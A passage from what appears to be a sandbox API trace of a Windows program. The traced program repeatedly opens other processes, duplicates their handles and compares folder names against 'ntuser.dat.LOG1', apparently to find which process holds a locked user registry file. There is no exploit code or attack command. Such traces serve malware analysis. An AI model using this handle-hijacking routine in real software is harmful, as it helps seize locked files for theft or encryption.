(hObject=0x1e4) returned 1 [0161.761] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.761] CloseHandle (hObject=0x194) returned 1 [0161.761] CloseHandle (hObject=0x1e8) returned 1 [0161.761] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0161.761] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.762] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.767] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.767] CloseHandle (hObject=0x1e4) returned 1 [0161.767] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.767] CloseHandle (hObject=0x194) returned 1 [0161.767] CloseHandle (hObject=0x1e8) returned 1 [0161.767] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0161.767] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.768] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.771] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.771] CloseHandle (hObject=0x1e4) returned 1 [0161.771] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.771] CloseHandle (hObject=0x194) returned 1 [0161.771] CloseHandle (hObject=0x1e8) returned 1 [0161.771] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0161.772] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.772] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.773] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.773] CloseHandle (hObject=0x1e4) returned 1 [0161.773] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.773] CloseHandle (hObject=0x194) returned 1 [0161.774] CloseHandle (hObject=0x1e8) returned 1 [0161.774] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0161.774] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.774] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.775] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.776] CloseHandle (hObject=0x1e4) returned 1 [0161.776] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.776] CloseHandle (hObject=0x194) returned 1 [0161.776] CloseHandle (hObject=0x1e8) returned 1 [0161.776] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0161.776] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.776] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.777] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.777] CloseHandle (hObject=0x1e4) returned 1 [0161.777] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.777] CloseHandle (hObject=0x194) returned 1 [0161.777] CloseHandle (hObject=0x1e8) returned 1 [0161.777] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0161.778] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.778] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.779] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.779] CloseHandle (hObject=0x1e4) returned 1 [0161.779] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.779] CloseHandle (hObject=0x194) returned 1 [0161.779] CloseHandle (hObject=0x1e8) returned 1 [0161.779] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0161.779] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.780] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.781] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.781] CloseHandle (hObject=0x1e4) returned 1 [0161.781] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.781] CloseHandle (hObject=0x194) returned 1 [0161.781] CloseHandle (hObject=0x1e8) returned 1 [0161.782] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0161.782] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.782] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.783] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.783] CloseHandle (hObject=0x1e4) returned 1 [0161.783] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.783] CloseHandle (hObject=0x194) returned 1 [0161.783] CloseHandle (hObject=0x1e8) returned 1 [0161.783] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0161.783] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.784] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.785] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.785] CloseHandle (hObject=0x1e4) returned 1 [0161.785] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.785] CloseHandle (hObject=0x194) returned 1 [0161.785] CloseHandle (hObject=0x1e8) returned 1 [0161.785] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0161.785] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.786] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.787] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.787] CloseHandle (hObject=0x1e4) returned 1 [0161.787] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.787] CloseHandle (hObject=0x194) returned 1 [0161.787] CloseHandle (hObject=0x1e8) returned 1 [0161.787] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0161.787] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.787] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.788] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.788] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.789] CloseHandle (hObject=0x1e4) returned 1 [0161.789] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.789] CloseHandle (hObject=0x194) returned 1 [0161.789] CloseHandle (hObject=0x1e8) returned 1 [0161.789] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0161.789] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.789] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.790] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.790] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.791] CloseHandle (hObject=0x1e4) returned 1 [0161.791] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.791] CloseHandle (hObject=0x194) returned 1 [0161.791] CloseHandle (hObject=0x1e8) returned 1 [0161.791] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0161.791] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.792] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.792] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.793] CloseHandle (hObject=0x1e4) returned 1 [0161.793] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.793] CloseHandle (hObject=0x194) returned 1 [0161.793] CloseHandle (hObject=0x1e8) returned 1 [0161.793] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0161.793] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.793] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.794] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.794] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.794] CloseHandle (hObject=0x1e4) returned 1 [0161.795] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.795] CloseHandle (hObject=0x194) returned 1 [0161.795] CloseHandle (hObject=0x1e8) returned 1 [0161.795] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0161.795] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.795] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.796] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.796] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.797] CloseHandle (hObject=0x1e4) returned 1 [0161.797] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.797] CloseHandle (hObject=0x194) returned 1 [0161.797] CloseHandle (hObject=0x1e8) returned 1 [0161.797] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0161.797] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.797] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.798] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.799] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.799] CloseHandle (hObject=0x1e4) returned 1 [0161.799] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.799] CloseHandle (hObject=0x194) returned 1 [0161.799] CloseHandle (hObject=0x1e8) returned 1 [0161.799] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0161.799] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.800] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.801] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.801] CloseHandle (hObject=0x1e4) returned 1 [0161.801] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.801] CloseHandle (hObject=0x194) returned 1 [0161.801] CloseHandle (hObject=0x1e8) returned 1 [0161.801] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0161.801] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.802] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.802] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.802] CloseHandle (hObject=0x1e4) returned 1 [0161.803] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.803] CloseHandle (hObject=0x194) returned 1 [0161.803] CloseHandle (hObject=0x1e8) returned 1 [0161.803] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0161.803] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.804] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.805] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.805] CloseHandle (hObject=0x1e4) returned 1 [0161.805] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.805] CloseHandle (hObject=0x194) returned 1 [0161.805] CloseHandle (hObject=0x1e8) returned 1 [0161.805] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0161.805] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.805] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.806] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.807] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.807] CloseHandle (hObject=0x1e4) returned 1 [0161.807] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.807] CloseHandle (hObject=0x194) returned 1 [0161.807] CloseHandle (hObject=0x1e8) returned 1 [0161.807] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0161.807] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.808] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.809] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.809] CloseHandle (hObject=0x1e4) returned 1 [0161.809] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.809] CloseHandle (hObject=0x194) returned 1 [0161.809] CloseHandle (hObject=0x1e8) returned 1 [0161.809] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0161.809] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.810] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.811] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.811] CloseHandle (hObject=0x1e4) returned 1 [0161.811] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.811] CloseHandle (hObject=0x194) returned 1 [0161.811] CloseHandle (hObject=0x1e8) returned 1 [0161.811] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0161.811] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.811] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.812] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.813] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.813] CloseHandle (hObject=0x1e4) returned 1 [0161.813] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.813] CloseHandle (hObject=0x194) returned 1 [0161.813] CloseHandle (hObject=0x1e8) returned 1 [0161.813] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0161.813] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.814] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.815] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.815] CloseHandle (hObject=0x1e4) returned 1 [0161.815] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.815] CloseHandle (hObject=0x194) returned 1 [0161.815] CloseHandle (hObject=0x1e8) returned 1 [0161.815] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0161.815] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.815] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.816] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.816] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.816] CloseHandle (hObject=0x1e4) returned 1 [0161.817] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.817] CloseHandle (hObject=0x194) returned 1 [0161.817] CloseHandle (hObject=0x1e8) returned 1 [0161.817] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0161.817] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.818] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.818] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.819] CloseHandle (hObject=0x1e4) returned 1 [0161.819] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.819] CloseHandle (hObject=0x194) returned 1 [0161.819] CloseHandle (hObject=0x1e8) returned 1 [0161.819] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0161.819] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, 